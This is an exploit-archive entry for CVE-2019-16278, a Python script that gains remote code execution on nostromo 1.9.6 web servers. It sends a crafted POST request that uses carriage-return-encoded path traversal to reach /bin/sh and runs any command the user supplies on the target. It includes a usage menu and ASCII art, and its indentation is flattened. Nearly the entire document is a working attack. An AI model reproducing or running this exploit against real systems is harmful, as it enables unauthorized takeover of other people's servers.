Share
# Exploit Title: nostromo 1.9.6 - Remote Code Execution  
# Date: 2019-12-31  
# Exploit Author: Kr0ff  
# Vendor Homepage:  
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz  
# Version: 1.9.6  
# Tested on: Debian  
# CVE : CVE-2019-16278  
  
cve2019_16278.py  
  
#!/usr/bin/env python  
  
import sys  
import socket  
  
art = """  
  
_____-2019-16278  
_____ _______ ______ _____\ \   
_____\ \_\ | | | / / | |   
/ /| || / / /|/ / /___/|   
/ / /____/||\ \ \ |/| |__ |___|/   
| | |____|/ \ \ \ | | | \   
| | _____ \| \| | | __/ __   
|\ \|\ \ |\ /| |\ \ / \   
| \_____\| | | \_______/ | | \____\/ |   
| | /____/| \ | | / | | |____/|   
\|_____| || \|_____|/ \|____| | |   
|____|/ |___|/   
  
  
  
"""  
  
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'  
  
def connect(soc):  
response = ""  
try:  
while True:  
connection = soc.recv(1024)  
if len(connection) == 0:  
break  
response += connection  
except:  
pass  
return response  
  
def cve(target, port, cmd):  
soc = socket.socket()  
soc.connect((target, int(port)))  
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)  
soc.send(payload)  
receive = connect(soc)  
print(receive)  
  
if __name__ == "__main__":  
  
print(art)  
  
try:  
target = sys.argv[1]  
port = sys.argv[2]  
cmd = sys.argv[3]  
  
cve(target, port, cmd)  
  
except IndexError:  
print(help_menu)